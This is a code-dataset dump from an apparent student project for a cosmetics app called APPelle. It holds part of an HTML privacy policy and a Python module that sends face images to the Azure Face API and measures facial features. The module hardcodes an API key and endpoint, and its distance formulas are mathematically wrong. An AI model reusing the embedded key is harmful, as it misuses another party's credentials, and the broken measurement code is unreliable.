YOU AND HOW DO WE USE IT?</h5>\n <t>APPelle believes that you, the consumer, are at the center of what we do. We love to hear from you, learn about who you are, and create and deliver products for you to enjoy. And we are aware that many of you enjoy talking to us. Because of this there are many ways to share your personal data with us and we can collect it.</t><br><br>\n\n <h5>How do we collect or receive your data?</h5>\n\n <t>We may collect or receive data from you through websites, forms, applications, devices, and in other ways. Sometimes you give us this directly (for example, when you create an account, when you contact us, sometimes we collect them (for example, using cookies to understand how you use our site / applications).</t><br>\n <t>When we collect data, we indicate the required fields with asterisks if such data is required for us:</t><br><br>\n <t>1. To provide you with the service you have requested (for example, to provide you with a newsletter);</t><br>\n <t>2. To comply with legal requirements (eg billing).</t><br><br>\n\n <t>If you do not provide the data marked with an asterisk, this may affect our ability to provide the products and services.</t><br>\n <t>We will present more details in the table below, explaining:</t><br><br>\n\n <t>1. During what interaction period can your data be provided or collected? This column explains the activity or situation you are in when we use or collect your data. For example, if you make a purchase, subscribe to a newsletter, or browse a site / application.</t><br>\n <t>2. What personal data do we receive directly from you or what results from your interaction with us? This column explains the types of data we may collect depending on the situation.</t><br>\n <t>3. How and why could we use them? This column explains what we can do with your data and the purpose for which we collect it.</t><br>\n <t>4. What is the legal basis for the use of your personal data? This column explains why we may use your data.</t><br><br>\n\n <t>Depending on the purpose for which the data is used, the legal basis for processing your data may be:</t><br><br>\n <t>1. Your consent;</t><br>\n <t>2. Our legitimate interest, which could be:</t><br>\n <t>2.1. Improving our products and services: specifically, our business interests to help us better understand your needs and expectations and therefore improve our services, sites / applications / devices, products and brands for the benefit of our consumers .</t><br>\n <t>2.2. Fraud prevention: to ensure that payment is complete and free from fraud.</t><br>\n <t>3. Securing our tools: keeping the tools you use (our sites / applications / devices) safe and making sure they work properly and are constantly improving.</t><br>\n <t>4. Fulfilling a contract: more precisely to perform the services you request from us.</t><br>\n <t>5. Legal reasons why data processing is required by law.</t><br><br>\n <article class=\"ac-large\">\n\t\t\t\t\t\t\t<div style=\"overflow-x: scroll;\">\n\t\t\t\t\t\t\t<table border=\"1\" width=\"100%\" cellspacing=\"0\" cellpadding=\"10\">\n\t\t\t\t\t\t\t<tbody>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td colspan=\"4\">\n\t\t\t\t\t\t\t\t<t><b>Overview of information about interactions with us and their consequences on your data</b></t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t><strong><em>\n\nDuring which interactions can you provide and we can collect your personal data?\n</em></strong></t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t><strong><em>What personal data can we receive from you directly or as a result of your interaction with us?</em></strong></t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t><strong><em>\n\nHow and why could we use your data?\n</em></strong></t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t><strong><em>\n\nWhat is the legal basis on which we can collect data from you?\n</em></strong></t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<t><strong>\n\nCreating and maintaining an Account\nThe information collected during the creation of an account on APPelle sites / applications, through a login on a social networking site or in the store.\n\n</strong></t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<t>\n\n\t\t\t\t\t\t\t\tDepending on how much you interact with us, this data may include:</t>\n\t\t\t\t\t\t\t\t<br><t>· Name and surname;</t><br>\n<t>· Gen;</t><br>\n<t>· Email Address;</t><br>\n<t>· Address;</t><br>\n<t>· Phone number;</t><br>\n<t>· Photography;</t><br>\n<t>· Birthday or age;</t><br>\n<t>· ID, username and password;</t><br>\n<t>· Personal description or preferences;</t><br>\n<t>· The data with which you connect on the sites of\nsocialization (if you share this personal data with us).</t><br>\n\n\n\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t> ·Send you marketing communications (if you have requested it) that can be tailored to your \"profile.\" (ie based on personal data we know about you and your preferences);\n\t\t\t\t\t\t\t\t<t>· Management of any contest, promotion, survey or competition in which you choose to participate;</t><br>\n\t\t\t\t\t\t\t\t<t>· Answer your questions and interact with you in other ways.</t><br>\n\t\t\t\t\t\t\t\t<t>· Offer you a loyalty program;</t><br>\n\t\t\t\t\t\t\t\t<t>· Allow you to manage your preferences;</t><br>\n\t\t\t\t\t\t\t\t<t>· Provide you with personalized information based on your beauty features;</t><br>\n\n\n\n</t>\n\n\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t> <strong>Consent</strong></t><br>\n\t\t\t\t\t\t\t<t>\nTo send you marketing communications directly, or to complete a survey\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· Monitoring and improving our websites / applications;</t><br>\n\t\t\t\t\t\t\t\t<t>· Execution of analyzes or collection of statistics;</t><br>\n\t\t\t\t\t\t\t\t<t>· Secure our websites / applications and protect you from fraud;</t><br>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· <strong>Legitimate interest\n </strong></t>\n\t\t\t\t\t\t\t<t>To ensure that our websites / applications remain secure, to protect them against fraud and to help us better understand your needs and expectations and therefore improve our services, products and brands.</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td rowspan=\"3\">\n\t\t\t\t\t\t\t<t><strong>\n\nNewsletter and subscription to commercial information\n\n\n</strong></t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td rowspan=\"3\">\n\t\t\t\t\t\t\t<t>Depending on how much you interact with us, this data may include:</t>\n\t\t\t\t\t\t\t<t>· Email Address;</t><br>\n\t\t\t\t\t\t\t<t>· Name and surname;</t><br>\n\t\t\t\t\t\t\t<t>· Personal description or preferences;\n</t><br>\n\t\t\t\t\t\t\t<t>· The data with which you connect on social networking sites (if you share this personal data with us).\n</t><br>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>For:</t>\n\t\t\t\t\t\t\t<t>· Send you marketing communications (if you have asked us) that can be tailored to your \"profile\" based on personal data we know about you and your preferences (including the location of your favorite store);</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· <strong>Consent</strong></t>\n\t\t\t\t\t\t\t<t>To send you marketing communications directly</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· Execution of analyzes or collection of statistics.\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· <strong>Legitimate interest</strong></t>\n\t\t\t\t\t\t\t<t>To adapt our marketing communications, understand their effectiveness and ensure that you have the most relevant experience; to help us better understand your needs and expectations and therefore improve our services, products and brands.</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· Maintain an up-to-date deletion list if you have requested not to be contacted; ;</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· <strong>Legal basis</strong></t>\n\t\t\t\t\t\t\t<t>To keep your details on a deletion list if you asked us not to send you any direct marketing.\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<t><strong>Browse online</strong></t>\n\t\t\t\t\t\t\t<t>Information collected through cookies or similar technologies (\"cookies\" *) as part of browsing the APPelle site / applications and / or the site / applications of a third party.\n</t><br>\n\t\t\t\t\t\t\t<t>For information on specific cookies placed on a particular website / application, see the relevant cookie table.\n</t><br>\n\t\t\t\t\t\t\t<t>* Cookies are small text files stored on your device (computer, tablet or mobile) when you are on the Internet, including on the sites of the APPelle group\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<t>Depending on how much you interact with us, this data may include:</t>\n\t\t\t\t\t\t\t<t>· Data regarding your use of our websites / applications:\n</t><br>\n\t\t\t\t\t\t\t<t>· Where are you from;</t><br>\n\t\t\t\t\t\t\t<t>· Authentication details;</t><br>\n\t\t\t\t\t\t\t<t>· The pages you looked at;</t><br>\n\t\t\t\t\t\t\t<t>· Videos you've watched;</t><br>\n\t\t\t\t\t\t\t<t>· The ads you click or place your cursor on;</t><br>\n\t\t\t\t\t\t\t<t>· The products you are looking for;</t><br>\n\t\t\t\t\t\t\t<t>· Your location;</t><br>\n\t\t\t\t\t\t\t<t>· Duration of your visit;</t><br><br>\n\t\t\t\t\t\t\t<t>Technical information:</t><br>\n\t\t\t\t\t\t\t<t>· IP address;</t><br>\n\t\t\t\t\t\t\t<t>· Informații legate de browser; </t><br>\n\t\t\t\t\t\t\t<t>· Device information;</t><br><br>\n\t\t\t\t\t\t\t<t>A unique identifier granted to each visitor and the expiry date of such an identifier\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>We use cookies, if necessary, together with other personal data that you have already shared with us (such as previous purchases or if you have subscribed to our e-mail newsletters) or for the following purposes:\n</t><br>\n\t\t\t\t\t\t\t<t>• To allow the proper functioning of our site / applications:</t><br>\n\t\t\t\t\t\t\t<t>· The correct display of the content, the creation and retention of your authentication data;\n</t><br>\n\t\t\t\t\t\t\t<t>· Interface customization, such as language;\n</t><br>\n\t\t\t\t\t\t\t<t>· Parameters attached to your device, including screen resolution, etc .;</t><br>\n\t\t\t\t\t\t\t<t>· Improving our sites / applications, for example, by testing new ideas.\n </t><br>\n\t\t\t\t\t\t\t<t>• To ensure that the site / application is safe and secure and that it protects you against fraud or misuse of our sites or services, for example by performing\nfuncției de troubleshooting\n</t><br>\n\t\t\t\t\t\t\t<t>• To collect statistics:\n</t><br>\n\t\t\t\t\t\t\t<t>· To avoid double registration of visitors;\n</t><br>\n\t\t\t\t\t\t\t<t>· To know the reaction of users to our advertising campaigns;</t><br>\n\t\t\t\t\t\t\t<t>· To improve our offers;</t><br>\n\t\t\t\t\t\t\t<t>· To know how you discovered our websites / applications.</t><br>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· <strong>Legitimate interest: </strong></t><br>\n\t\t\t\t\t\t\t<t>To ensure that we provide you with properly functioning and continuously improving websites / applications, advertising and communications for cookies that are (i) essential to the operation of our websites / applications, (ii) and for keep them safe.</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>• To provide behavioral advertising online: </t><br>\n\t\t\t\t\t\t\t<t>· To show you online ads for products that may be of interest to you, based on previous behavior;</t><br>\n\t\t\t\t\t\t\t<t>· To show you ads and content on social platforms.\n</t><br>\n\t\t\t\t\t\t\t<t>• To customize our services for you:\n</t><br>\n\t\t\t\t\t\t\t<t>· Send you recommendations, marketing or content based on your profile and interests;\n</t><br>\n\t\t\t\t\t\t\t<t>· To display our sites / applications in a tailored way such as login reminder, your language, personalized cookies for the user interface (ie the parameters attached to your device, including screen resolution, preference for fonts etc.)</t>\n\t\t\t\t\t\t\t<br><t>• To allow the distribution of our content on social networking sites (distribution buttons for displaying the site).\n</t><br>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· <strong>Consent</strong></t>\n\t\t\t\t\t\t\t<t>For all other cookies.</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<t><strong>Promotional operations</strong></t>\n\t\t\t\t\t\t\t<t>Information collected during a game, contests, promotional offers, sample requests, surveys.\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<t>Depending on how much you interact with us, this data may include:\n</t>\n\t\t\t\t\t\t\t<t>· Name and surname;</t>\n\t\t\t\t\t\t\t<t>· Email Address;</t>\n\t\t\t\t\t\t\t<t>· Număr de telefon;</p>\n\t\t\t\t\t\t\t<t>· Phone number;</t>\n\t\t\t\t\t\t\t<t>· Sex;</t>\n\n\t\t\t\t\t\t\t<t>· Personal description or preferences;\n</t>\n\t\t\t\t\t\t\t<t>· The data with which you log on to social networking sites (if you share this data with us;</t>\n\t\t\t\t\t\t\t<t>· Other information you shared with us about you, for example, via the \"My Account\" page, by contacting us or providing your own content, such as photos or reviews, or a question via the chat feature available on certain sites / applications, or participating in a contest, game, poll).\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· To complete the tasks you have asked us to do, for example to manage your participation in contests, games and surveys, including to take into account your feedback and suggestions;\n</t>\n\t\t\t\t\t\t\t<t>· Send you marketing communications (when requested) - by including you in a specific marketing database through which we send you personalized marketing information (based on profiling) by electronic means (e.g. by e-mail). -mail, via SMS, etc., depending on your option)</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· <strong>Consent</strong></t>\n\t\t\t\t\t\t\t<t>To send you marketing communications directly or to access your requests.\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· For statistical purposes.</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Legitimate interest </strong></p>\n\t\t\t\t\t\t\t<p>To help us better understand your needs and expectations and therefore improve our services, products and brands\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<p><strong>User-generated content</strong></p>\n\t\t\t\t\t\t\t<p>The information collected when you submitted certain content on a social platform or we accepted the reuse of the content you posted on social media platforms.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<p>Depending on how much you interact with us, this data may include:</p>\n\t\t\t\t\t\t\t<p>· Name and surname or pseudonym;</p>\n\t\t\t\t\t\t\t<p>· Email Address;</p>\n\t\t\t\t\t\t\t<p>· Photography;</p>\n\t\t\t\t\t\t\t<p>· Personal description or preferences;</p>\n\t\t\t\t\t\t\t<p>· The data with which you log in on social networking sites (if you share this data with us;\n</p>\n\t\t\t\t\t\t\t<p>· Other information you shared with us about you, for example, via the \"My Account\" page, by contacting us or providing your own content, such as photos or reviews, or a question via the chat feature available on certain sites / applications).\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>• In accordance with the specific terms and conditions accepted by you:\n</p>\n\t\t\t\t\t\t\t<p>· To post your review or content;</p>\n\t\t\t\t\t\t\t<p>· Promoting our products.</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p><strong>Consent</strong></p>\n\t\t\t\t\t\t\t<p>·To use content posted online.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· For statistical purposes.</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Legitimate interest\n</strong></p>\n\t\t\t\t\t\t\t<p>To help us better understand your needs and expectations and therefore improve and promote our services, products and brands.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<p><strong>Use of applications and devices\n</strong></p>\n\t\t\t\t\t\t\t<p>The information collected is part of your use of our applications and / or devices.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<p>Depending on how much you interact with us, this data may include:</p>\n\t\t\t\t\t\t\t<p>· Name and surname;</p>\n\t\t\t\t\t\t\t<p>· Email Address;</p>\n\t\t\t\t\t\t\t<p>· Location;</p>\n\t\t\t\t\t\t\t<p>· Date of birth;</p>\n\t\t\t\t\t\t\t<p>·Personal description or preferences;\n</p>\t\t\t\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>For</p>\n\t\t\t\t\t\t\t<p>· Provide you with the requested service (for example, practical testing of our products, tips and notifications on sun exposure, hair care, etc.);</p>\n\t\t\t\t\t\t\t<p>· Analyzing the appearance characteristics and recommending the right products (including customized products) and care;\n</p>\n\t\t\t\t\t\t\t<p>· Offering product recommendations and care;</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Fulfilling a contract</strong></p>\n\t\t\t\t\t\t\t<p>To provide you with the requested service (including, if necessary, analysis by the research and innovation team of the algorithm required to provide the service).</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· For research and innovation by APPelle scientists;</p>\n\t\t\t\t\t\t\t<p>· To monitor and improve our applications and devices;\n</p>\n\t\t\t\t\t\t\t<p>· For statistical purposes.</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Legitimate interest\n</strong></p>\n\t\t\t\t\t\t\t<p>To always improve our products and services to meet your needs and expectations and for research and innovation purposes.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td rowspan=\"3\">\n\t\t\t\t\t\t\t<p><strong>Requests</strong></p>\n\t\t\t\t\t\t\t<p>The information collected when you ask questions (for example, through the customer department) about our brands, products and use.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td rowspan=\"3\">\n\t\t\t\t\t\t\t<p>Depending on how much you interact with us, this data may include:</p>\n\t\t\t\t\t\t\t<p>· Name and surname;</p>\n\t\t\t\t\t\t\t<p>· Email Address;</p>\n\t\t\t\t\t\t\t<p>· Location;</p>\n\t\t\t\t\t\t\t<p>· Date of birth;</p>\n\t\t\t\t\t\t\t<p>·Personal description or preferences;\n</p>\t\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· To be able to answer your questions;</p>\n\t\t\t\t\t\t\t<p>When necessary, to connect to the relevant services</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Consent\n</strong></p>\n\t\t\t\t\t\t\t<p>To answer your questions</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· For statistical purposes.</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Legitimate interest\n</strong></p>\n\t\t\t\t\t\t\t<p>To help us better understand the needs and expectations of our customers and therefore improve our services, products and brands.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>• For Cosmetovigilance:\n </p>\n\t\t\t\t\t\t\t<p>· Monitoring and preventing any unwanted effects related to the use of our products;\n</p>\n\t\t\t\t\t\t\t<p>· For conducting studies on the safe use of our products;\n</p>\n\t\t\t\t\t\t\t<p>· To carry out and monitor corrective action taken, where necessary.</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Legal basis</strong></p>\n\t\t\t\t\t\t\t<p>To comply with the legal obligation to monitor the adverse effects of its products.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p><strong>Sponsorships</strong></p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>Depending on how much you interact with us, this data may include:</p>\n\t\t\t\t\t\t\t<p>· Name and surname;</p>\n\t\t\t\t\t\t\t<p>· Email Address;</p>\n\t\t\t\t\t\t\t<p> Phone number;</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· To send information about our products.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Fulfilling a contract\n</strong></p>\n\t\t\t\t\t\t\t<p>To comply with the request.\n</p>\n\t\t\t\t\t\t\t<p><strong>And</strong></p>\n\t\t\t\t\t\t\t<p>· <strong>Legitimate interest\n</strong></p>\n\t\t\t\t\t\t\t<p>To contact a person at the request of another person.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t</tbody>\n\t\t\t\t\t\t\t</table>\n\t\t\t\t\t\t\t</div>\n\n </div>\n </div>\n </div>\n </div>\n\n\n <div class=\"footer\">\n <div class=\"footerbar\">\n <a href=\"#Copyright\">Copyright @APPelle 2020</a>\n\t\t<a href=\"http://127.0.0.1:5000/terms\" class=\"right\">Terms and conditions</a>\n\t\t<a href=\"http://127.0.0.1:5000/personaldata\" class=\"right\">Protection of personal data</a>\n </div>\n </div>\n</body>\n</html>"
},
{
"alpha_fraction": 0.6470639705657959,
"alphanum_fraction": 0.6513266563415527,
"avg_line_length": 57.06060791015625,
"blob_id": "548a3f8afa9836956e0f7f4d0bcc5b547609685c",
"content_id": "9a92f4280ed0387b3d559a67e3b1fb3fd0d45777",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11495,
"license_type": "no_license",
"max_line_length": 376,
"num_lines": 198,
"path": "/Ai/ApiFacial.py",
"repo_name": "HarangusPaul/Bool-s",
"src_encoding": "UTF-8",
"text": "from io import BytesIO\nimport os\nfrom PIL import Image, ImageDraw\nimport requests\nimport math\nfrom azure.cognitiveservices.vision.face import FaceClient\nfrom azure.cognitiveservices.vision.face.models import FaceAttributeType\nfrom msrest.authentication import CognitiveServicesCredentials\n\n\nKEY = '99f1b2d5bb01427fb0f7ec8f1b859a1a'\n\nENDPOINT = 'https://appelleface.cognitiveservices.azure.com/'\n\nface_client = FaceClient(ENDPOINT, CognitiveServicesCredentials(KEY))\n\n\ndef face_scan(face1 : str):\n\n face_attributes = ['age', 'gender', 'headPose', 'smile', 'facialHair', 'glasses', 'emotion']\n\n image = open(face1 , 'r+b')\n detected_faces = face_client.face.detect_with_stream(image,return_face_landmarks=True,return_face_attributes=face_attributes)\n if not detected_faces:\n raise Exception(\n 'No face detected from image')\n\n for face in detected_faces:\n eye_left_top = face.face_landmarks.eye_left_top\n eye_left_bottom = face.face_landmarks.eye_left_bottom\n eye_left_outer = face.face_landmarks.eye_left_outer\n eye_left_inner = face.face_landmarks.eye_left_inner\n eye_right_top = face.face_landmarks.eye_right_top\n eye_right_bottom = face.face_landmarks.eye_right_bottom\n eye_right_outer = face.face_landmarks.eye_right_outer\n eye_right_inner = face.face_landmarks.eye_right_inner\n pupil_left = face.face_landmarks.pupil_left\n pupil_right = face.face_landmarks.pupil_right\n nose_tip = face.face_landmarks.nose_tip\n mouth_left = face.face_landmarks.mouth_left\n mouth_right = face.face_landmarks.mouth_right\n eyebrow_left_outer = face.face_landmarks.eyebrow_left_outer\n eyebrow_left_inner = face.face_landmarks.eyebrow_left_inner\n eyebrow_right_inner = face.face_landmarks.eyebrow_right_inner\n eyebrow_right_outer = face.face_landmarks.eyebrow_right_outer\n nose_root_left = face.face_landmarks.nose_root_left\n nose_root_right = face.face_landmarks.nose_root_right\n nose_left_alar_top = face.face_landmarks.nose_left_alar_top\n nose_right_alar_top = face.face_landmarks.nose_right_alar_top\n nose_left_alar_out_tip = face.face_landmarks.nose_left_alar_out_tip\n nose_right_alar_out_tip = face.face_landmarks.nose_right_alar_out_tip\n upper_lip_top = face.face_landmarks.upper_lip_top\n upper_lip_bottom = face.face_landmarks.upper_lip_bottom\n under_lip_top = face.face_landmarks.under_lip_top\n under_lip_bottom = face.face_landmarks.under_lip_bottom\n face_age = face.face_attributes.age\n face_gender = face.face_attributes.gender\n head_pose = face.face_attributes.head_pose\n smile = face.face_attributes.smile\n facial_hair = face.face_attributes.facial_hair\n glasses = face.face_attributes.glasses\n face_emotion = face.face_attributes.emotion\n dicti = {\n 'eye_left_top' : eye_left_top,\n 'eye_left_bottom' : eye_left_bottom,\n 'eye_left_outer' : eye_left_outer,\n 'eye_left_inner' : eye_left_inner,\n 'eye_right_top' : eye_right_top,\n 'eye_right_bottom' : eye_right_bottom,\n 'eye_right_outer' : eye_right_outer,\n 'eye_right_inner' : eye_right_inner,\n 'pupil_left' : pupil_left,\n 'pupil_right' : pupil_right,\n 'nose_tip' : nose_tip,\n 'mouth_left' : mouth_left,\n 'mouth_right' : mouth_right,\n 'eyebrow_left_outer' : eyebrow_left_outer,\n 'eyebrow_left_inner' : eyebrow_left_inner,\n 'eyebrow_right_inner' : eyebrow_right_inner,\n 'eyebrow_right_outer' : eyebrow_right_outer,\n 'nose_root_left' : nose_root_left,\n 'nose_root_right' : nose_root_right,\n 'nose_left_alar_top' : nose_left_alar_top,\n 'nose_right_alar_top' : nose_right_alar_top,\n 'nose_left_alar_out_tip' : nose_left_alar_out_tip,\n 'nose_right_alar_out_tip' : nose_right_alar_out_tip,\n 'upper_lip_top' : upper_lip_top,\n 'upper_lip_bottom' : upper_lip_bottom,\n 'under_lip_top' : under_lip_top,\n 'under_lip_bottom' : under_lip_bottom,\n 'face_age' : face_age,\n 'face_gender' : face_gender,\n 'head_pose' : head_pose,\n 'smile' : smile,\n 'facial_hair' : facial_hair,\n 'glasses' : glasses,\n 'face_emotion' : face_emotion\n }\n\n return dicti\n\n\n # def getRectangle(faceDictionary):\n # rect = faceDictionary.face_rectangle\n # left = rect.left\n # top = rect.top\n # right = left + rect.width\n # bottom = top + rect.height\n #\n # return ((left, top), (right, bottom))\n # response = requests.get(image)\n # img = Image.open(BytesIO(response.content))\n #\n # # For each face returned use the face rectangle and draw a red box.\n # print('Drawing rectangle around face... see popup for results.')\n # print()\n # draw = ImageDraw.Draw(img)\n # for face in detected_faces:\n # draw.rectangle(getRectangle(face), outline='red')\n #\n # img.show()\n\n\ndef file_user(filename):\n\n location_file = str(filename)\n dicti = face_scan(location_file)\n\n text = \"\"\n\n distanta_intre_pupile = int(math.sqrt(((dicti['pupil_right'].x ** 2) - (dicti['pupil_left'].x ** 2))\n + ((dicti['pupil_right'].y ** 2) - (dicti['pupil_left'].y ** 2))))\n marimea_ochi_latura_a = int(math.sqrt((dicti['eye_left_inner'].x ** 2 - dicti['eye_left_outer'].x** 2)\n + (dicti['eye_left_inner'].y ** 2 - dicti['eye_left_outer'].y ** 2)))\n marimea_ochi_latura_b = int(math.sqrt((dicti['eye_left_bottom'].x ** 2 - dicti['eye_left_top'].x ** 2)\n + (dicti['eye_left_bottom'].y ** 2 - dicti['eye_left_top'].y ** 2)))\n arie = marimea_ochi_latura_a * marimea_ochi_latura_b\n lungimea_gurii = int(math.sqrt((dicti['mouth_right'].x ** 2 - dicti['mouth_left'].x ** 2)\n + (dicti['mouth_right'].y ** 2 - dicti['mouth_left'].y ** 2)))\n lungimea_sprancenelor_stanga = int(math.sqrt((dicti['eyebrow_left_inner'].x ** 2 - dicti['eyebrow_left_outer'].x ** 2)\n + (dicti['eyebrow_left_inner'].y ** 2 - dicti['eyebrow_left_outer'].y ** 2)))\n lungimea_sprancenelor_dreapta = int(math.sqrt((dicti['eyebrow_right_outer'].x ** 2 - dicti['eyebrow_right_inner'].x ** 2)\n + (dicti['eyebrow_right_outer'].y ** 2 - dicti['eyebrow_right_inner'].y ** 2)))\n marimea_buzelor_sus = int(math.sqrt((dicti['upper_lip_top'].x - dicti['upper_lip_bottom'].x)**2 + (dicti['upper_lip_top'].y - dicti['upper_lip_bottom'].y)**2 ))\n marimea_buzelor_jos = int(math.sqrt((dicti['under_lip_top'].x - 